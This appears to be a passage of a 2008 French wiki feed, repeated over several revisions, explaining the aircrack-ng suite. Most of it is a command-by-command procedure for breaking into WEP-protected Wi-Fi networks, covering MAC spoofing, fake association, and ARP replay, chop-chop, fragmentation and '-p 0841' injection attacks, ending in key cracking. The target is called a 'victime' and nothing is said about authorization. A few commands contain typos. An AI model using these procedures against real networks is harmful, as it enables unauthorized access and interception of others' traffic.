&amp;lt;br /&amp;gt;$canal = canal wifi à utiliser (colonne &amp;quot;CH&amp;quot; dans airodump-ng)&lt;br /&gt;
&amp;lt;br /&amp;gt;$bssid_cible = BSSID du point d'acces ciblé&lt;br /&gt;
&amp;lt;br /&amp;gt;$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne &amp;quot;STATION&amp;quot; dans airodump-ng)&lt;br /&gt;
&lt;br /&gt;
=== Mac spoofing ===&lt;br /&gt;
Pour les procédures ci-dessous, dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type:&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt;macchanger --mac $mac $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;et relancer la carte.&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;ARP replay&amp;quot; ===&lt;br /&gt;
'''Méthode avec client (en cas de filtrage MAC, spoofer l'adresse MAC du client comme expliqué plus haut)'''&lt;br /&gt;
* Mettre carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;30 = temps d'attente entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher''&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-3 = attaque ARP replay&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&lt;br /&gt;
=== Methode &amp;quot;chop-chop&amp;quot; et &amp;quot;par fragmentation&amp;quot; ===&lt;br /&gt;
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''&lt;br /&gt;
* Mettre la carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodum-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfice à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;0 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher''&lt;br /&gt;
** En cas d'échec:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;6000 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;-o = nombre de jeux de paquets à envoyer à la fois&lt;br /&gt;
&amp;lt;br /&amp;gt;-q = intervale entre 2 paquets &amp;quot;keep-alive&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* Attaque:&lt;br /&gt;
Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop.&lt;br /&gt;
&amp;lt;br /&amp;gt;Dans les 2 cas, un fichier .xor sera créé en cas de succès.&lt;br /&gt;
** Par fragmentation:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-5 = attaque par fragmentation&lt;br /&gt;
** Chop-chop:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-4 = attaque chop-chop&lt;br /&gt;
&lt;br /&gt;
* Création d'un paquet ARP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp&lt;br /&gt;
&amp;lt;br /&amp;gt;-0 = générer un paquet ARP&lt;br /&gt;
&amp;lt;br /&amp;gt;-k = IP de destination (la plupart des AP répondent au 255.255.255.255)&lt;br /&gt;
&amp;lt;br /&amp;gt;-l = IP source (la plupart des AP répondent au 255.255.255.255)&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = nom du fichier dans lequel mettre le paquet ARP&lt;br /&gt;
&lt;br /&gt;
* Injection de l'ARP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -2 -r $fichier_arp $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-2 = selection de paquets interactive (accepter le paquet avec &amp;quot;y&amp;quot;)&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;-p 0841&amp;quot; ===&lt;br /&gt;
'''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''&lt;br /&gt;
* Mettre la carte en mode monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à la station:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;0 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succès, &amp;quot;Association successful :-)&amp;quot; doit s'afficher&lt;br /&gt;
** En cas d'échec:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;6000 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;-o = nombre de jeux de paquets à envoyer à la fois&lt;br /&gt;
&amp;lt;br /&amp;gt;-q = intervale entre 2 paquets &amp;quot;keep-alive&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-2 = sélection de paquets interactive (accepter le paquet avec &amp;quot;y&amp;quot;)&lt;br /&gt;
&amp;lt;br /&amp;gt;-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;/div&gt;</summary>
		<author><name>Mattoufoutu</name></author>	</entry>

	<entry>
		<id>http://hack-it.org/index.php?title=Aircrack-ng</id>
		<title>Aircrack-ng</title>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=Aircrack-ng"/>
				<updated>2008-12-19T02:26:16Z</updated>
		
		<summary type="html">&lt;p&gt;Mattoufoutu&amp;nbsp;:&amp;#32;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Les outils de la suite aircrack ==&lt;br /&gt;
&lt;br /&gt;
=== aircrack-ng ===&lt;br /&gt;
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.&lt;br /&gt;
&lt;br /&gt;
=== airbase-ng ===&lt;br /&gt;
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au &amp;quot;fake-ap&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
=== airdecap-ng ===&lt;br /&gt;
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.&lt;br /&gt;
&lt;br /&gt;
=== airdecloak-ng ===&lt;br /&gt;
Sert à décloaker (démasquer) les bssid cloakés&lt;br /&gt;
&lt;br /&gt;
=== airdriver-ng ===&lt;br /&gt;
Sert à compiler, dés/installer les drivers appropriés à votre carte.&lt;br /&gt;
&lt;br /&gt;
=== aireplay-ng ===&lt;br /&gt;
Sert à injecter des paquets et à s'authentifier auprès des AP.&lt;br /&gt;
&lt;br /&gt;
=== airmon-ng ===&lt;br /&gt;
Sert à dés/activer le mode monitor sur votre carte.&lt;br /&gt;
&lt;br /&gt;
=== airodump-ng ===&lt;br /&gt;
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.&lt;br /&gt;
&lt;br /&gt;
=== airserv-ng ===&lt;br /&gt;
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.&lt;br /&gt;
&lt;br /&gt;
=== airolib-ng ===&lt;br /&gt;
Permet de créer une base de données sqlite en vue d'un crack WPA.&lt;br /&gt;
&amp;lt;br /&amp;gt;'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.'''&lt;br /&gt;
&lt;br /&gt;
=== airtun-ng ===&lt;br /&gt;
&lt;br /&gt;
=== buddy-ng ===&lt;br /&gt;
A utiliser avec easside-ng&lt;br /&gt;
&lt;br /&gt;
=== easside-ng ===&lt;br /&gt;
Outil &amp;quot;auto-magic&amp;quot; permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.&lt;br /&gt;
&lt;br /&gt;
=== ivstools ===&lt;br /&gt;
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.&lt;br /&gt;
&lt;br /&gt;
=== makeivs ===&lt;br /&gt;
Permet de créer un fichier .ivs à partir d'une clé WEP connue.&lt;br /&gt;
&lt;br /&gt;
=== packetforge-ng ===&lt;br /&gt;
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).&lt;br /&gt;
&lt;br /&gt;
=== tkiptun-ng ===&lt;br /&gt;
Permet d'aider au crack de clés WPA utilisant TKIP.&lt;br /&gt;
&amp;lt;br /&amp;gt;'''ATTENTION: Cet outil n'est pas encore fonctionnel.'''&lt;br /&gt;
&lt;br /&gt;
=== wesside-ng ===&lt;br /&gt;
Outil permettant l'automatisation du crack de clé WEP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&amp;lt;big&amp;gt;&amp;lt;u&amp;gt;'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''&amp;lt;/u&amp;gt;&amp;lt;/big&amp;gt;&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Les drivers WiFi ==&lt;br /&gt;
Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng.&lt;br /&gt;
* Pour connaitre les drivers supportés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng supported&lt;br /&gt;
&lt;br /&gt;
* Pour connaitre les drivers déjà installés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aidriver-ng installed&lt;br /&gt;
&lt;br /&gt;
* Pour connaitre les drivers WiFi chargés dans le kernel:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng loaded&lt;br /&gt;
&lt;br /&gt;
* Pour détecter les cartes WiFi:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng detect&lt;br /&gt;
&lt;br /&gt;
* Pour décharger un driver inutile:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng unload $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour compiler un driver:&lt;br /&gt;
Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper:&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airdriver-ng compile $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour installer un driver fraichement compilé:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng install $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour charger un driver dans le kernel:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng load $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour avoir des détails sur un driver:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng details $num_driver&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les différents types d'attaques ==&lt;br /&gt;
Dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type &amp;quot;macchanger --mac $mac $iface&amp;quot;, et relancer la carte.&lt;br /&gt;
&lt;br /&gt;
=== Légende ===&lt;br /&gt;
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)&lt;br /&gt;
&amp;lt;br /&amp;gt;$canal = canal wifi à utiliser (colonne &amp;quot;CH&amp;quot; dans airodump-ng)&lt;br /&gt;
&amp;lt;br /&amp;gt;$bssid_cible = BSSID du point d'acces ciblé&lt;br /&gt;
&amp;lt;br /&amp;gt;$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne &amp;quot;STATION&amp;quot; dans airodump-ng)&lt;br /&gt;
&lt;br /&gt;
=== Mac spoofing ===&lt;br /&gt;
Pour les procédures ci-dessous, dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type:&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt;macchanger --mac $mac $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;et relancer la carte.&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;ARP replay&amp;quot; ===&lt;br /&gt;
'''Méthode avec client (en cas de filtrage MAC, spoofer l'adresse MAC du client comme expliqué plus haut)'''&lt;br /&gt;
* Mettre carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;30 = temps d'attente entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher''&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-3 = attaque ARP replay&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&lt;br /&gt;
=== Methode &amp;quot;chop-chop&amp;quot; et par fragmentation ===&lt;br /&gt;
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''&lt;br /&gt;
* Mettre la carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodum-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfice à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;0 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher''&lt;br /&gt;
** En cas d'échec:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;6000 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;-o = nombre de jeux de paquets à envoyer à la fois&lt;br /&gt;
&amp;lt;br /&amp;gt;-q = intervale entre 2 paquets &amp;quot;keep-alive&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* Attaque:&lt;br /&gt;
Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop.&lt;br /&gt;
&amp;lt;br /&amp;gt;Dans les 2 cas, un fichier .xor sera créé en cas de succès.&lt;br /&gt;
** Par fragmentation:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-5 = attaque par fragmentation&lt;br /&gt;
** Chop-chop:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-4 = attaque chop-chop&lt;br /&gt;
&lt;br /&gt;
* Création d'un paquet ARP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp&lt;br /&gt;
&amp;lt;br /&amp;gt;-0 = générer un paquet ARP&lt;br /&gt;
&amp;lt;br /&amp;gt;-k = IP de destination (la plupart des AP répondent au 255.255.255.255)&lt;br /&gt;
&amp;lt;br /&amp;gt;-l = IP source (la plupart des AP répondent au 255.255.255.255)&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = nom du fichier dans lequel mettre le paquet ARP&lt;br /&gt;
&lt;br /&gt;
* Injection de l'ARP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -2 -r $fichier_arp $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-2 = selection de paquets interactive (accepter le paquet avec &amp;quot;y&amp;quot;)&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;-p 0841&amp;quot; ===&lt;br /&gt;
'''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''&lt;br /&gt;
* Mettre la carte en mode monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à la station:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;0 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succès, &amp;quot;Association successful :-)&amp;quot; doit s'afficher&lt;br /&gt;
** En cas d'échec:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;6000 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;-o = nombre de jeux de paquets à envoyer à la fois&lt;br /&gt;
&amp;lt;br /&amp;gt;-q = intervale entre 2 paquets &amp;quot;keep-alive&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-2 = sélection de paquets interactive (accepter le paquet avec &amp;quot;y&amp;quot;)&lt;br /&gt;
&amp;lt;br /&amp;gt;-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;/div&gt;</summary>
		<author><name>Mattoufoutu</name></author>	</entry>

	<entry>
		<id>http://hack-it.org/index.php?title=Aircrack-ng</id>
		<title>Aircrack-ng</title>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=Aircrack-ng"/>
				<updated>2008-12-19T01:49:15Z</updated>
		
		<summary type="html">&lt;p&gt;Mattoufoutu&amp;nbsp;:&amp;#32;Aircrack-ng, outils et utilisation&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Les outils de la suite aircrack ==&lt;br /&gt;
&lt;br /&gt;
=== aircrack-ng ===&lt;br /&gt;
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.&lt;br /&gt;
&lt;br /&gt;
=== airbase-ng ===&lt;br /&gt;
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au &amp;quot;fake-ap&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
=== airdecap-ng ===&lt;br /&gt;
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.&lt;br /&gt;
&lt;br /&gt;
=== airdecloak-ng ===&lt;br /&gt;
Sert à décloaker (démasquer) les bssid cloakés&lt;br /&gt;
&lt;br /&gt;
=== airdriver-ng ===&lt;br /&gt;
Sert à compiler, dés/installer les drivers appropriés à votre carte.&lt;br /&gt;
&lt;br /&gt;
=== aireplay-ng ===&lt;br /&gt;
Sert à injecter des paquets et à s'authentifier auprès des AP.&lt;br /&gt;
&lt;br /&gt;
=== airmon-ng ===&lt;br /&gt;
Sert à dés/activer le mode monitor sur votre carte.&lt;br /&gt;
&lt;br /&gt;
